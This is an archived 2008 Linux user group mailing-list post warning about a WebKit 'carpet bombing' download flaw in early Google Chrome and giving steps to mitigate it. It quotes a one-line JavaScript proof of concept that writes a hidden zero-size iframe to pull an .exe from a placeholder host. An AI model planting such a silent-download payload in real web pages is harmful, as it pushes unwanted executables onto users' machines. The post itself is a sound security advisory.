LUG: Google Chrome browser 0-day exploit!
jcuzella at mines.edu
Fri Sep 5 11:31:44 MDT 2008
For those of you that may be experimenting with the new and exciting
google chrome browser: Beware!
As Kevin informed me last night, it uses a vulnerable version of webkit
(525.13), which contains the "carpet bombing" flaw found eariler in Safari.
For more information see here:
The proof of concept is surprisingly simple:
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
While google is working on a workaround patch, the following steps may
be taken to prevent you from getting pwnt:
1. Click on the wrench in Chrome's upper right corner.
2. Click OPTIONS on the dropdown menu.
3. Check the box labeled "Ask where to save each file before downloading."
The vulnerability will still exist, however you will now be prompted for
- Jim C.
-------------- next part --------------
A non-text attachment was scrubbed...
Size: 195 bytes
Desc: OpenPGP digital signature
Url : https://mailman.mines.edu/mailman/private/lug/attachments/20080905/29719ea5/attachment.bin
More information about the lug